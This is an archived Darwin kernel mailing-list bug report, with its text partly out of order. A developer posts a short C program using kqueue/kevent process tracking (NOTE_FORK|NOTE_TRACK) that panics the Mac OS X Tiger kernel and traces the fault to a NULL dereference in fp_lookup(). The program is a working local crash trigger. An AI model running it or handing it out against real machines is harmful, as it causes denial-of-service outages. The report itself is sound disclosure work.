site_archiver@lists.apple.com Delivered-To: darwin-kernel@lists.apple.com Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:mime-version:content-transfer-encoding:message-id:content-type:to:subject:date:x-mailer:from; b=rvDaLOWAP9xIlFYGlaBKtRrNqKUDNGm5JfGWM4MVVWN+n182kfwktllenq9oAfG4FrUUydxw/F/57rIoVYhQ8pG0NFd5S0ceiqSXtRY3c8KPQdEQI4KDu2p4NRmWDMN7mtw2/CbiVfbElJOb597p3/iwyAr1/vcnhE9P+Yd4Cb4= /* @@@@@@@@@@@@@@@@@@@*/ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/event.h> int main (int argc, char **argv) { int kq; struct kevent ke; if (argc < 1) return -1; if ((kq = kqueue ()) < 0) { fprintf (stderr, "kqueue creation error\n"); return -1; } if (kevent(kq, &ke, 1, NULL, 0, NULL) < 0) { fprintf (stderr, "kevent set error\n"); return -1; } while (1) { memset(&ke, 0, sizeof(struct kevent)); if (kevent(kq, NULL, 0, &ke, 1, NULL) < 0) { fprintf (stderr, "kevent get error\n"); return -1; } if (ke.fflags & NOTE_FORK) printf("%d forked\n", ke.ident); if (ke.fflags & NOTE_CHILD) printf("child of %d is %d\n", ke.data, ke.ident); if (ke.fflags & NOTE_TRACKERR) printf("NOTE_TRACK error\n"); } return 0; } /* @@@@@@@@@@@@@@@@@@@*/ LOCATION OF BUG: Whoever re-organized the kqueue/kevent code, please fix it. Thanks, Lakshmipathy _______________________________________________ Do not post admin requests to the list. They will be ignored. Darwin-kernel mailing list (Darwin-kernel@lists.apple.com) Help/Unsubscribe/Update your Subscription: http://lists.apple.com/mailman/options/darwin-kernel/site_archiver%40lists.a... Hi all, The kernel released with 10.4.* (Tiger) has a serious bug. The following user program causes kernel panic. EV_SET (&ke, atoi (argv[1]), EVFILT_PROC, EV_ADD, NOTE_FORK | NOTE_TRACK, 0, NULL); The problem is with the NULL pointer reference in fp_lookup() in bsd/kern/kern_descrip.c. The function call sequence is fork() -> fork1 () -> knote () -> filt_proc () -> kevent_register () -> fp_lookup (). filt_proc () calls kevent_register () with NULL as third argument. (kern_event.c:501), which is referenced in fp_lookup () without check for NULL. This email sent to site_archiver@lists.apple.com